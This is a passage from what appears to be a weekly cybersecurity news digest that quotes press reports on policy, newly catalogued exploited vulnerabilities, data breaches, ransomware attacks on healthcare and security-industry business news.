    • “Rapid7 today published an analysis of that ransomware ecosystem after US authorities seized infrastructure tied to the notorious RAMP cybercrime forum last month. For years, RAMP has been the primary vehicle for acquiring ransomware-as-a-service (RaaS) affiliates, but the Jan. 28 interagency sting led by the FBI forced many cybercrime outfits to find a new means to sell their wares. 
    • “Rapid7’s Alexandra Blia and Efi Sherman in this week’s blog post identified two potential forums where attackers might go next. The bigger takeaway, however, is that the cybercrime ecosystem is fragmenting, and defenders will need to adapt.”
  • and
    • A newly developed method for gauging the impact of an OT cybersecurity incident could pave the way for more accurate measurement and response to an event, and also shine light on risk and business ramifications.
    • The Operational Technology Incident (OTI) Impact Score — which will be unveiled today [February 24] at the ICS/OT industry’s S4x26 Conference in Miami — aims to provide rapid clarity on the actual effects of OT cyber incidents, which often get over- or under-hyped, according to Dale Peterson, co-creator of the OTI model and head of ICS/OT consulting and research firm Digital Bond.
    • The OTI model, inspired by the Richter Scale used for measuring earthquake intensity and impact, is meant for OT business executives, governments, cyber insurers, the media, and the general public, according to Peterson, who is the founder and program chair of S4.
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the cybersecurity policy and law enforcement front,

  • Cyberscoop reports from its Cybertalks event held earlier this week.
    • “Department of Health and Human Services official said Thursday that HHS is devoting a lot of attention to the security of third-party service providers after the 2024 Change Healthcare cyberattack.
    • “That attack, which is widely regarded as the biggest ever in the sector — including by HHS’s Charlee Hess, who spoke Thursday at CyberTalks presented by CyberScoop — began with hackers exploiting the lack of multifactor authentication set up on a remote access portal at Change Healthcare.
    • “It wasn’t a hospital, it was a company most people have never heard of and had major impacts on our sector and threatened the liquidity of our entire health care system,” said Hess, director of the healthcare and public health sector cybersecurity at the Administration for Strategy Preparedness and Response division. “We recovered from that, but we realized there are third-party risks lurking in our health care system, and we don’t even know they’re there. Where are those entities or systems that will have an outsized impact on our sector?”
  • and
    • “A top FBI cyber official said Salt Typhoon, the Chinese cyber espionage group behind the widespread compromise of U.S. telecommunications infrastructure in 2024, continues to pose a broad threat to both America’s private and public sectors.
    • “Michael Machtinger, deputy assistant director for cyber intelligence at the FBI, touted improved partnerships between the telecommunications industry and government in the wake of the campaign while speaking at CyberTalks, presented by CyberScoop, in Washington D.C. Thursday.
    • “Companies who engaged with the FBI and federal agencies like CISA early after the campaign went public “have been without a doubt the most successful in mitigating the impact of the Salt Typhoon intrusions,” he claimed.”
  • and
    • “The Trump administration wants to boost the use of artificial intelligence for security in a way that doesn’t increase the number of targets for adversaries to attack, a top official with the Office of the National Cyber Director said Thursday.
    • “The administration will “promote the rapid implementation of AI enabled cyber defensive tools to detect, divert and deceive threat actors who continue targeting our vital systems and sectors,” Alexandra Seymour, principal deputy assistant cyber director for policy, said at CyberTalks, presented by CyberScoop. “We want to ensure that as Americans, companies and agencies deploy AI to defend themselves, they are not inadvertently making themselves more vulnerable by widening the attack surface.”
    • “Overall, “We’re working with our interagency and White House colleagues to promote AI-driven success while addressing concerns about AI security and countering AI abuse by adversaries,” she said.
    • “The focus on AI is expected to get further attention from a forthcoming national cyber strategy and the implementation of that strategy due to follow.”
  • Federal News Network adds,
    • “The National Institutes of Standards and Technology is launching a new project around standards for artificial intelligence agents, with NIST positioning the project as key to advancing agentic AI innovation.
    • “NIST’s Center for AI Standards and Innovation (CAISI) announced the “AI Agent Standards Initiative” this week. The project aims to foster “industry-led technical standards and protocols that build public trust in AI agents, catalyze an interoperable agent ecosystem, and diffuse their benefits to all Americans and across the world,” NIST said in a release this week.
    • “AI agents can now work autonomously for hours, write and debug code, manage emails and calendars, and shop for goods, among other emerging use cases,” NIST added. “While the productivity promise is enticing, the real-world utility of agents is constrained by their ability to interact with external systems and internal data. Absent confidence in the reliability of AI agents and interoperability among agents and digital resources, innovators may face a fragmented ecosystem and stunted adoption.”
    • “While NIST’s press release positioned the project around innovation, the initiative’s opening products are centered on security. Since AI agents can take actions autonomously, tech experts say they present significant safety and security concerns.
    • “The initiative’s initial outputs includes a request for information on “AI agent security.” The deadline for responses to the RFI is March 9.”
  • Per February 19, 2026, HHS news release,
    • “[T]he U.S. Department of Health and Human Services’ (HHS) Office for Civil Rights (OCR) announced a settlement with Top of the World Ranch Treatment Center (TWRTC), a substance use disorder treatment provider in Illinois, for a potential violation of the Health Insurance Portability and Accountability Act of 1996 (HIPAA) Security Rule.” * * *
    • “The settlement resolves an investigation of TWRTC that OCR initiated after receiving a breach report that TWRTC filed in March 2023. TWRTC reported that, as a result of a successful phishing attack, an unauthorized third party accessed ePHI through a workforce member’s email account. TWRTC concluded that the ePHI for 1,980 patients was compromised by the attack. OCR’s investigation found evidence that TWRTC failed to conduct an accurate and thorough risk analysis to determine the potential risks and vulnerabilities to the confidentiality, integrity, and availability of the ePHI TWRTC holds as required by the HIPAA Security Rule.
    • “Under the terms of the resolution agreement, TWRTC agreed to implement a corrective action plan that OCR will monitor for two years, and paid $103,000 to OCR.” * * *
    • “The resolution agreement and corrective action plan may be found at: https://www.hhs.gov/sites/default/files/ocr-ra-cap-twrtc.pdf [PDF, 249 KB]
  • Cyberscoop reports,
    • “A Ukrainian national who ran multiple operations to aid the North Korean government’s expansive scheme to hire remote IT workers at U.S. companies was sentenced to five years in prison, the Justice Department said Thursday.
    • “Oleksandr Didenko stole U.S. citizens’ identities and created more than 2,500 fraudulent accounts on freelance IT job forums, money service transmitters, email services, and social media platforms to sell the proxy identities to North Korean workers. The 29-year-old pleaded guilty to multiple crimes related to the six-year scheme in November 2025.” * * *
    • “U.S. law enforcement has racked up some wins by seizing stolen cryptocurrency and targeting U.S.-based facilitators who provide forged or stolen identities for North Korean operatives. 
    • “Yet, the regime’s scheme runs deep. North Korean nationals have infiltrated many top global companies, and researchers continue to uncover evidence of new tactics and techniques operatives have used to evade detection.”

From the cybersecurity vulnerabilities and breaches front,

  • Bleeping Computer tells us,
    • “PayPal is notifying customers of a data breach after a software error in a loan application exposed their sensitive personal information, including Social Security numbers, for nearly 6 months last year.
    • “The incident affected the PayPal Working Capital (PPWC) loan app, which provides small businesses with quick access to financing.
    • “PayPal discovered the breach on December 12, 2025, and determined that customers’ names, email addresses, phone numbers, business addresses, Social Security numbers, and dates of birth had been exposed since July 1, 2025.
    • “The financial technology company said it has reversed the code change that caused the incident, blocking attackers’ access to the data one day after discovering the breach.
    • “On December 12, 2025, PayPal identified that due to an error in its PayPal Working Capital (“PPWC”) loan application, the PII of a small number of customers was exposed to unauthorized individuals during the timeframe of July 1, 2025 to December 13, 2025,” PayPal said in breach notification letters sent to affected users.”
  • The Cybersecurity and Infrastructure Security Agency (CISA) added eight known exploited vulnerabilities to its catalog during this shutdown week.
    • February 17, 2026
      • CVE-2008-0015 Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
      • CVE-2020-7796 
      • CVE-2024-7694 TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
      • CVE-2026-2441 Google Chromium CSS Use-After-Free Vulnerability
        • Cybersecurity News discusses the MS Windows KVE here.
        • The Hacker News discusses the other three KVEs here.
    • February 18, 2026
      • CVE-2021-22175 GitLab Server-Side Request Forgery (SSRF) Vulnerability
      • CVE-2026-22769 Dell RecoverPoint for Virtual Machines (RP4VMs) Use of Hard-coded Credentials Vulnerability
        • DeV discusses the GitLab KVE here.
        • Bleeping Computer discusses the Dell KVE which demands immediate attention.
    • February 20, 2026
      • CVE-2025-49113 RoundCube Webmail Deserialization of Untrusted Data Vulnerability
      • CVE-2025-68461 RoundCube Webmail Cross-site Scripting Vulnerability
        • The Hacker News discusses these KVEs here.
  • Cybersecurity Dive reports,
    • “A critical vulnerability in BeyondTrust Remote Support is facing an increase in threat activity, with hackers deploying SparkRAT and vShell backdoors and using remote management tools to conduct reconnaissance, according to a blog post released Thursday by Palo Alto Networks’ Unit 42. 
    • “Multiple BeyondTrust Remote Support users have been confirmed targets, and a range of industries have been impacted, including financial services, technology, higher education, legal services and healthcare among others. 
    • “The vulnerability, tracked as CVE-2026-1731, is an operating system command injection flaw that also impacts some older versions of BeyondTrust Privileged Remote Access. 
    • “The flaw was originally discovered by researchers at Hacktron and disclosed to BeyondTrust.”
  • Per an HHS announcement,
    • “The Department of Health and Human Services (HHS) encourages Healthcare and Public Health (HPH) sector organizations to review and address a critical vulnerability identified in BeyondTrust Remote Support and Privileged Remote Access solutions in light of rising cyber attacks affecting the sector.
    • “BeyondTrust published Security Advisory BT26-02 regarding a critical pre-authentication remote code execution vulnerability, identified as CVE-2026-1731, affecting Remote Support and older versions of Privileged Remote Access. The vulnerability carries a CVSSv4 score of 9.9 and may be triggered through specially crafted client requests, potentially allowing an unauthenticated remote attacker to execute operating system commands in the context of the site user. 
    • “The vulnerability affects Remote Support version 25.3.1 and prior and Privileged Remote Access version 24.3.4 and prior, with remediation available through specific patches or by upgrading to fixed versions. BeyondTrust issued patches on February 2, 2026, which were automatically deployed to instances with the update service enabled and fully applied to Software as a Service environments. BeyondTrust applied patches to all SaaS customers as of February 2, 2026, and instructed self-hosted customers to manually apply updates or upgrade to supported versions where necessary. For additional information, organizations are encouraged to review the BeyondTrust Security Advisory.”
  • Dark Reading relates,
    • “New data suggests a cyber espionage group is laying the groundwork for attacks against major industries.
    • “The “React2Shell” vulnerability is already almost a few months old, but it’s far from over. An unknown but possibly state-sponsored threat actor has been using a newly discovered, maturely named toolkit — “ILovePoop” — to probe tens of millions of Internet protocol (IP) addresses worldwide, looking for opportunities to exploit React2Shell. A report from WhoisXML API, shared with Dark Reading, suggests the threat actor might be out for big game: government, defense, finance, and industrial organizations, among others, around the world but particularly in the United States.
    • “A few months later, the situation has yet to calm down, Pham says. “There are still tens of thousands of vulnerable instances exposed on the internet, and additional botnets have added React2Shell to their arsenals. It has also been confirmed in ransomware campaigns,” she says. 
    • “The big difference now is that the attacks have gotten more sophisticated, as the attackers have had more time to gameplan. “The post-exploitation tradecraft has gotten more sophisticated over time. We are seeing things like PeerBlight’s use of the BitTorrent DHT as a resilient C2 fallback, which is a technique designed specifically to survive traditional domain takedowns,” Pham says.” * * *
    • “Patching a deep-rooted vulnerability like React2Shell isn’t as simple as clicking an “Update” button.”
  • and
    • “When Hillai Ben Sasson and Dan Segev set out to hack AI infrastructure two years ago, they expected to find vulnerabilities — but they didn’t expect to compromise virtually every major AI platform they targeted.
    • “The two researchers — who work in offensive and defensive research, respectively, at cloud-security firm Wiz — wanted to experiment with how they could attack the AI infrastructure being deployed as part of foundational models, AI services, and in-house AI projects. Yet, what started as simple attacks on the AI supply chain — such as abusing the widely used Pickle format to run arbitrary code — evolved into a comprehensive threat assessment spanning five distinct layers of the AI stack.
    • “They plan to present the lessons learned over their two years of research at the upcoming RSAC Conference in March. Perhaps the most important lesson: Focus on the infrastructure used to train, run, and host AI services, and not on prompt-injection attacks, says Segev, a security architect in the Office of the CTO at Wiz.”
  • and
    • “A growing phishing-as-a-service (PhaaS) tool reliably undermines traditional methods for detecting phishing attacks, both technical and psychological.
    • “Starkiller,” described this week by researchers at Abnormal AI, is packaged and sold with a sleekness comparable to legitimate software-as-a-service (SaaS) platforms. It’s got a clean, retrofuturist dashboard, sporting real-time campaign analytics. It gets periodic updates, and even allows its cybercriminal users to log in using two-factor authentication (2FA).
    • “It’s got substance to back up its style, too. Its website advertises “enterprise-grade phishing infrastructure” for “campaigns that bypass modern security systems.” Though its self-reported 99.7% success rate is almost certainly fictional, it really does help attackers bypass many of the traditional phishing security techniques so many enterprises rely on, according to Abnormal AI’s research.”
  • Cybersecurity Dive notes,
    • “The vulnerability of the “connective tissue” of the AI ecosystem — the Model Context Protocol and other tools that let AI agents communicate — “has created a vast and often unmonitored attack surface” that is making it easier for hackers to use AI to launch cyberattacks, Cisco said in a report published Thursday [February 19].
    • “Cisco said AI tools’ increasing ability to “execute processes, access databases, and push code on behalf of humans” has become the dominant AI risk and warned companies not to give AI “unsupervised control over critical business functions.”
    • “The new report also described nation-state hackers’ use of AI and warned businesses about potential AI supply-chain crises.”

From the ransomware front,

  • Bleeping Computer reports,
    • “The University of Mississippi Medical Center (UMMC) closed all its clinic locations statewide on Thursday [February 19] following a ransomware attack.
    • “UMMC has over 10,000 employees and, as one of the largest employers in Mississippi, operates seven hospitals, 35 clinics, and more than 200 telehealth sites statewide. The medical center includes the state’s only children’s hospital, only Level I trauma center, only organ and bone marrow transplant program, and the only Telehealth Center of Excellence, one of two across the United States.
    • “As revealed on Thursday afternoon, the cyberattack took down many of its IT systems and blocked access to the Epic electronic medical records. While UMMC cancelled outpatient and ambulatory surgeries/procedures and imaging appointments, officials said hospital services continue via downtime procedures.”
  • The HIPAA Journal points out ransomware attacks against three other healthcare entities.
    • “Issaqueena Pediatric Dentistry in South Carolina, Enhabit Home Health & Hospice in Texas, and AltaMed Health Services in California have announced that patient data has potentially been compromised in ransomware attacks.”
  • Per an Arctic Wolf news release,
    • “Arctic Wolf®, a global leader in security operations, today [February 17] published the 2026 edition of its Threat Report, which analyzes hundreds of real‑world incident response engagements and threat intelligence findings from the past year. The report reveals a continued rise in data‑theft‑driven extortion, sustained pressure from ransomware groups, and a significant increase in attacks that leverage remote access tools rather than technical exploits.
    • “In 2025, ransomware, business email compromise (BEC), and data incidents once again dominated Arctic Wolf’s caseload, accounting for 92% of all incident response engagements. While ransomware remained the most common category, data‑only extortion incidents surged 11x year over year, signaling a strategic shift as threat actors adapt to improved organizational recovery capabilities. The report also finds that 65% of non‑BEC intrusions stemmed from abuse of remote access technologies like RDP, VPN, and RMM tools; which is a dramatic rise that underscores attackers’ preference for low‑friction entry points.
    • “Attackers continue to rely on operational efficiency – logging in instead of breaking in, stealing data instead of encrypting it, and exploiting trusted tools rather than complex vulnerabilities,” said Ismael Valenzuela, vice president, Labs, Threat Research & Intelligence, Arctic Wolf. “Organizations that invested in visibility, identity security, and disciplined remote access controls were far more resilient throughout the year.”
  • Cybersecurity Dive adds,
    • “Hackers are using ransomware to accelerate the timeline for cyberattacks, moving on average four times faster than just a year ago, according to an incident response report released Tuesday by Palo Alto Networks. 
    • “AI is being used for reconnaissance, phishing and scripting, and operational execution in many cases. In the most efficient attacks, groups exfiltrate data just 72 minutes after initial access. 
    • “Identity is a primary element in attacks, showing up in 90% of incident response cases. Threat groups are increasingly using stolen identities and tokens to gain entry without triggering security warnings.
    • “Once an attacker has legitimate credentials, they’re not breaking in, they’re logging in,” Sam Rubin, a senior vice president at Palo Alto Networks’ Unit 42, told Cybersecurity Dive. “When an adversary blends into normal traffic, detection becomes incredibly challenging for even mature defenders.”
    • “The report is based on analysis of more than 750 incident response cases across the globe that involved Unit 42 analysts and researchers.”
  • Qualys assesses “What Is Black Basta Ransomware and How to Mitigate Attack.”
  • IT Brew considers how a ransomware attacker thinks.
    • “When it comes to ransomware criminals, the answers can vary. Some organizations are sophisticated businesses where hackers are treated as employees with HR departments and paid time-off, while others are more ramshackle.
    • “But they’re all dangerous—and after your data. Mike Puglia, general manager of cybersecurity labs at Kaseya, told IT Brew that financial motivation has been the constant motive of ransomware attackers. The tactics are much the same between groups: gaining access, exploiting vulnerabilities, escalating privileges, and deploying an encrypter to hold the data for payment.
    • “It’s Whac-a-Mole, or a game of cat and mouse, between defenders and attackers, and as soon as one hole is closed, suddenly the next wave comes,” Puglia said.”
  • Per an HHS announcement,
    • “The National Institute of Standards and Technology (NIST) hosted a virtual event titled Resources for Ransomware Risk Management on January 28, 2026. The event focused on ransomware as a persistent risk to organizations of all sizes and sectors and emphasized the need for cross-sector collaboration to develop practical resources for reducing ransomware risk. Speakers from NIST, the Center for Internet Security, and the Institute for Security and Technology (IST) provided an overview of available ransomware risk management resources designed to help organizations establish foundational safeguards and build effective strategies. Featured resources included the NIST Ransomware Risk Management Cybersecurity Framework 2.0 Community Profile, published as an initial public draft, and the IST and Ransomware Task Force Blueprint for Ransomware Defense, which offers an actionable framework tailored for small to medium-sized enterprises. Presenters described the development and use of these resources and discussed ongoing and future efforts in ransomware risk management, with the session allowing time for audience questions and discussion. For additional details, refer to the Ransomware Risk Management webinar.”

From the cybersecurity business and defenses front,

  • The Wall Street Journal reports,
    • “Palo Alto Networks (PANW) lifted its full-year revenue outlook after recording a jump in second-quarter profit driven by continued demand for cybersecurity services.
    • “However, the company issued per-share earnings guidance for its current quarter below Wall Street expectations, in part as it contends with higher costs for memory and storage. It plans to raise prices later in the fiscal year to offset the increases.
    • “The stock, which has dropped 11.2% to start the year, fell 8% in late trading Tuesday to $150.46.
    • “The Santa Clara, Calif.-based company on Tuesday [February 17] said it now expects full-year revenue to come in between $11.28 billion and $11.31 billion, up from a range of $10.5 billion to $10.54 billion.
    • “The raised revenue view came after Palo Alto reported a profit of $432 million, or 61 cents a share, for its fiscal second quarter, compared with a profit of $267.3 million, or 38 cents a share the prior year.”
  • Cybersecurity Dive adds,
    • “As investors worry that existing software and services could be rendered obsolete, Palo Alto Networks CEO Nikesh Arora said the rapid acceleration of AI should not be considered a threat to cybersecurity. 
    • “Arora addressed the concerns on Tuesday during the company’s fiscal second-quarter conference call, where the surge in AI dominated much of the discussion. 
    • “As AI becomes more pervasive across the enterprise, it expands the attack surface area, more infrastructure, more machine-to-machine activity and new classes of risk that simply didn’t exist before,” Arora said. “In that environment, security cannot sit on the sidelines.”
    • “Arora said despite the current sentiment about software and AI, the company believes that security is the enabling layer “that allows innovation to move forward safely and at scale.”
  • and
    • “Businesses need to pay attention to identity security and third-party risk management to avoid falling prey to hackers whose techniques have evolved, the risk intelligence company Dataminr said in a threat report published on Wednesday [February 18].
    • “2025 marked a clear shift from ‘frequent but contained’ cyber losses toward fewer events with materially larger financial and mission impact,” the report said, attributing the shift to “multi-vector attacks” leveraging stolen credentials, data theft, operational disruptions and regulatory exposure.
    • “Dataminr’s report contains several high-priority recommendations for enterprises, including about supply chain security and the need to look beyond a vulnerability’s severity score.”
  • Dark Reading offers “A CISO’s Playbook for Defending Data Assets Against AI Scraping.”
    • “Discover a strategic approach to govern scraping risks, balance security with business growth, and safeguard intellectual capital from automated data harvesting.”
  • Cyberscoop relates,
    • “Anthropic is rolling out a new security feature for Claude Code that can scan a user’s software codebases for vulnerabilities and suggest patching solutions.
    • “The company announced Friday that Claude Code Security will initially be available to a limited number of enterprise and team customers for testing. That follows more than a year of stress-testing by the internal red teamers, competing in cybersecurity Capture the Flag contests and working with Pacific Northwest National Laboratory to refine the accuracy of the tool’s scanning features.
    • “Large language models have shown increasing promise at both code generation and cybersecurity tasks over the past two years, speeding up the software development process but also lowering the technical bar required to create new websites, apps and other digital tools.
    • “We expect that a significant share of the world’s code will be scanned by AI in the near future, given how effective models have become at finding long-hidden bugs and security issues,” the company wrote in a blog post.”
  • Tech Target shares a “CISO’s guide to demonstrating cyber resilience.”
    • “Elevating cybersecurity to a state of resilience requires a security team to adapt and strengthen defenses. The result should be that a future attack is less likely to succeed.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the cybersecurity policy front,

  • Per a February 11, 2026, Cybersecurity and Infrastructure Security Agency news release,
    • “The Cybersecurity and Infrastructure Security Agency (CISA) unveiled its 2025 Year in Review today, spotlighting bold achievements that strengthened the nation’s cyber and physical security in 2025. The report underscores CISA’s commitment to innovation, resilience, and collaboration. This report is a snapshot of goals achieved for this past year. Year over year CISA’s goals change as the threat landscape evolves and as we lean into core mission objectives as determined by the Administration’s policies. 
    • “The Year in Review is more than a report – it’s proof of CISA’s unwavering commitment to protecting the infrastructure and systems Americans count on every day,” said CISA Acting Director Madhu Gottumukkala. “From safeguarding federal networks to equipping communities with tools to reduce risk, our team delivered measurable results in 2025. And we’re not slowing down – we will lead with innovation, resilience and partnership to stay ahead of tomorrow’s threats.”
  • Federal News Network reports,
    • “Sen. Ron Wyden (D-Ore.) is pledging to keep his hold on the nominee to lead the Cybersecurity and Infrastructure Security Agency. Wyden said he will continue to object to Sean Plankey’s nomination until CISA releases a 2022 report on security flaws in the U.S. telecommunications system. Wyden previously held up Plankey’s nomination for much of last year over the same issue. (Sen. Ron Wyden (D-Ore.) floor remarks – Congress.gov)”
  • Cyberscoop tells us,
    • “A recent attempt at a destructive cyberattack on Poland’s power grid has prompted the Cybersecurity and Infrastructure Security Agency to publish a warning for U.S. critical infrastructure owners and operators.
    • “Tuesday’s alert follows a Jan. 30 report from Poland’s Computer Emergency Response Team that concluded the December attack overlapped significantly with infrastructure used by a Russian government-linked hacking group, and that it targeted 30 wind and photovoltaic farms, among others.
    • “CISA said its warning was meant to “amplify” that Polish report. In particular, CISA said the attack highlighted the threats to operational technology and industrial control systems, most commonly used in the energy and manufacturing sectors.
    • “And CISA’s alert continues a recent agency focus on securing edge devices like routers or firewalls, after a binding operational directive last week to federal agencies to strip unsupported products from their systems.”
  • Cybersecurity Dive relates,
    • “The Cybersecurity and Infrastructure Security Agency wants critical infrastructure partners’ feedback on the scope of its cyber-incident reporting regulation as the agency homes in on a final version of the long-awaited rule.
    • “In a notice set for publication in the Federal Register on Friday [January 13], CISA announced a series of town hall meetings where different sectors will be able to share their thoughts about the pending rule, which Congress required in the 2022 Cyber Incident Reporting for Critical Infrastructure Act.
    • “A draft version of the CIRCIA rule, published in April 2024, gave covered infrastructure operators 72 hours to report substantial cyber incidents to the government. Business groups and some lawmakers objected to the scope of the information that companies would need to report, as well as to the breadth of companies covered under the regulation.
    • “In its new announcement, CISA said it “appreciates stakeholders’ interest and concern that CISA implement CIRCIA to maximize its impact on improving our nation’s cybersecurity posture while minimizing unnecessary burden to entities in critical infrastructure sectors.”
    • “The agency wants infrastructure operators to share “specific, actionable improvements” to CIRCIA that “clarify or reduce” the burden of the planned reporting requirement while still giving the government ample information about the cyber-threat landscape.”
    • The virtual town hall meeting for the Emergency Services Sector, Government Facilities Sector, Healthcare and Public Health Sector is scheduled for March 17, 2026.
  • Federal News Network reports,
    • “The Cybersecurity and Infrastructure Security Agency plans to designate 888 of its 2,341 employees as excepted during a shutdown. All of those employees would go without pay during a shutdown.
    • “A shutdown forces many of our frontline security experts and threat hunters to work without pay — even as nation-states and criminal organizations intensify efforts to exploit critical systems that Americans rely on — placing an unprecedented strain on our national defenses,” Acting CISA Director Madhu Gottumukkala told lawmakers this week.
    • “The cyber agency’s core responsibilities include defending federal agency networks and working with critical infrastructure to strengthen their security.
    • “Gottumukkala said that a shutdown would delay the deployment of new cyber services to federal networks and the sharing of guidance with critical infrastructure partners. It would also likely delay CISA’s work to finalize a landmark cyber incident reporting rule.”

From the cybersecurity vulnerabilities and breaches front,

  • CISA added eleven known exploited vulnerabilities to its catalog this week.
    • February 10, 2026
      • CVE-2026-21510 Microsoft Windows Shell Protection Mechanism Failure Vulnerability
      • CVE-2026-21513 Microsoft MSHTML Framework Security Feature Bypass Vulnerability
      • CVE-2026-21514 Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
      • CVE-2026-21519 Microsoft Windows Type Confusion Vulnerability
      • CVE-2026-21525 Microsoft Windows NULL Pointer Dereference Vulnerability
      • CVE-2026-21533 Windows Remote Desktop Services Elevation of Privilege Vulnerability
        • SecPod discusses these KVEs here.
    • February 12, 2026
      • CVE-2024-43468 Microsoft Configuration Manager SQL Injection Vulnerability
      • CVE-2025-15556 Notepad++ Download of Code Without Integrity Check Vulnerability
      • CVE-2025-40536 SolarWinds Web Help Desk Security Control Bypass Vulnerability
      • CVE-2026-20700 Apple Multiple Buffer Overflow Vulnerability
        • Nopsec discusses the MS Configuration KVE here.
        • WNEsecurity discusses the Notepad++ KVE here.
        • Rapid7 discusses the Solarwinds KVE here.
        • Bleeping Computer discusses the Apple KVE here.
    • February 13, 2026
      • CVE-2026-1731 BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA) OS Command Injection Vulnerability
        • The Hacker News discusses this KVE here.
  • Cybersecurity Dive informs us,
    • “Security researchers warn that threat groups are exploiting critical vulnerabilities in SmarterMail, a business email and collaboration server that small to medium-sized businesses use as an alternative to Microsoft Exchange. 
    • “A China-linked threat actor, tracked as Storm 2603, has exploited an authentication bypass vulnerability tracked as CVE-2026-23760 to deploy Warlock ransomware, according to a blog released Monday by researchers at Reliaquest. 
    • “The hacker abuses legitimate administrative functions to hide its activity from security teams. It then installs a digital forensic tool called Velociraptor to maintain access in preparation for potential ransomware attacks, according to Reliaquest. 
    • “SmarterTools, the parent company behind SmarterMail, confirmed in a Feb. 3 blog post that its own network was impacted by a Jan. 29 breach.” 
  • and
    • “More than 80% of exploitation activity targeting critical vulnerabilities in Ivanti Endpoint Manager Mobile were traced to a single IP address hiding behind a bulletproof hosting infrastructure, according to a report released Tuesday by GreyNoise. 
    • “Researchers warn that several of the most shared indicators of compromise linked to the current threat campaign indicate no activity linked to Ivanti EPMM. The concern is that security teams may therefore be looking for the wrong information, as current IoCs indicate scanning for Oracle WebLogic instead, according to GreyNoise researchers.”
  • Cyberscoop notes,
    • “A new report from Google found evidence that state-sponsored hacking groups have leveraged AI tool Gemini at nearly every stage of the cyber attack cycle.
    • “The research underscores how AI tools have matured in their cyber offensive capabilities, even as it doesn’t reveal novel or paradigm shifting uses of the technology.
    • “John Hultquist, chief analyst at Google’s Threat Intelligence Group, told CyberScoop that many countries still appear to be experimenting with AI tools, determining where they best fit into the attack chain and provide more benefit than friction.
    • “Nobody’s got everything completely worked out,” Hultquist said. “They’re all trying to figure this out and that goes for attacks on AI, too.”
    • “But the report also reveals that frontier AI models can build speed, scale and sophistication into a myriad of hacking tasks, and state-sponsored hacking groups are taking advantage.”
  • Bleeping Computer points out,
    • “Threat actors are abusing Claude artifacts and Google Ads in ClickFix campaigns that deliver infostealer malware to macOS users searching for specific queries.
    • “At least two variants of the malicious activity have been observed in the wild, and more than 10,000 users have accessed the content with dangerous instructions.
    • “A Claude artifact is content generated with Anthropic’s LLM that has been made public by the author. It can be anything from instructions, guides, chunks of code, or other types of output that are isolated from the main chat and accessible to anyone via links hosted on the claude.ai domain.”
  • and
    • “A set of 30 malicious Chrome extensions that have been installed by more than 300,000 users are masquerading as AI assistants to steal credentials, email content, and browsing information.
    • “Some of the extensions are still present in the Chrome Web Store and have been installed by tens of thousands of users, while others show a small install count.
    • “Researchers at browser security platform LayerX discovered the malicious extension campaign and named it AiFrame. They found that all analyzed extensions are part of the same malicious effort as they communicate with infrastructure under a single domain, tapnetic[.]pro.”
  • and
    • “A new variation of the fake recruiter campaign from North Korean threat actors is targeting JavaScript and Python developers with cryptocurrency-related tasks.
    • “The activity has been ongoing since at least May 2025 and is characterized by modularity, which allows the threat actor to quickly resume it in case of partial compromise.
    • “The bad actor relies on packages published on the npm and PyPi registries that act as downloaders for a remote access trojan (RAT). In total, researchers found 192 malicious packages related to this campaign, which they dubbed ‘Graphalgo’.
    • “Researchers at software supply-chain security company ReversingLabs say that the threat actor creates fake companies in the blockchain and crypto-trading sectors and publishes job offerings on various platforms, like LinkedIn, Facebook, and Reddit.”
  • TechRadar advises
    • “If you’re using an older Android phone, Google has a message you probably don’t want to hear.
    • “More than 40% of Android devices worldwide no longer receive critical security updates, leaving over 1 billion phones exposed to malware and spyware attacks, according to the company.
    • “The problem isn’t a sudden flaw but a slow drift. Android adoption data shows most users are still running software versions that Google no longer fully supports. While recent confusion around Google Play system update dates has raised concerns, Google says that the issue is cosmetic.
    • “The real issue is simpler and more serious: phones running Android 12 or older are now outside the security safety net.”

From the ransomware front,

  • The HIPAA Journal reports,
    • “A new record was set for ransomware attacks last year, with disclosed ransomware attacks increasing by 49% year-over-year to a record-high of 1,174 attacks, according to Black Fog’s 2025 State of Ransomware Report. There was also a 37% year-over-year increase in undisclosed attacks, with 7,079 victims added to dark web data leak sites in 2025. The figures indicate that globally, 86% of ransomware attacks are not disclosed by victims.
    • “Data theft almost always occurs with ransomware attacks. In 2025, 96% of attacks involved data exfiltration prior to file encryption, which results in greater organizational harm. Data exfiltration has contributed to the significant increase in breach costs, as data theft results in greater reputational harm and increased regulatory exposure. In 2025, the average cost of a data breach was $4.44 million globally, and $7.42 million for healthcare data breaches. Healthcare retained its position as the sector most targeted by ransomware groups in 2025, accounting for 22% of disclosed attacks. All sectors experienced an increase in attacks in 2025, apart from education, which saw a 13% year-over-year decrease in attacks.
    • “The breakup of large ransomware groups has led to a fragmentation of the ransomware ecosystem, and the number of active ransomware groups continued to increase in 2025. Black Fog tracked 130 different ransomware groups in 2025, of which 52 were new groups that emerged in 2025, a 9% increase from 2024. Several groups that emerged in 2025 have disproportionately targeted the healthcare sector, including Sinobi, Insomnia, and Devman. Devman issued the largest ever ransom demand of $91 million in 2025 for its attack on China’s real estate development company Shimao Group Holdings. World Leaks, widely believed to be a rebrand of Hunters International, has also claimed several healthcare victims, as have all of the top three most prolific and dangerous ransomware groups of the year: Qilin, Akira & Play.”
  • Cybersecurity Dive adds,
    • “Ransomware attacks on the IT sector were higher in each quarter of 2025 than in the same quarters of 2024, with the sector ranking third behind manufacturing and commercial facilities on hackers’ target lists, according to a new report from the Information Technology Information Sharing and Analysis Center.
    • “Nearly half of all ransomware attacks that the IT-ISAC tracked occurred in the U.S., far surpassing the totals in other countries.
    • “The food and agriculture sector also saw a significantly higher number of ransomware attacks in 2025 than it did in 2024, according to a new report from that sector’s ISAC, which shares leadership with the IT-ISAC.”
  • The Federal Trade Commission has issued its own 2025 ransomware report according to Executivegov.
    • “The Federal Trade Commission has reported that ransomware and other malware-based attacks represent only 2.23 percent of all fraud complaints submitted to the agency.
    • “In the 2025 Ransomware Report published Friday, the FTC shared that, between July 2023 and June 2025, tech support scams were among the most reported fraud types.
    • “About 1 percent of the 42,972 reports the FTC received that allegedly originate from China are ransomware. The majority of the complaints are related to online shopping fraud.
    • “Complaints tied to Russia, Iran and North Korea are relatively rare, with the three countries accounting for only 0.05 percent of all fraud reports the FTC received from 2023 to 2025.”
  • Morphisec calls attention to
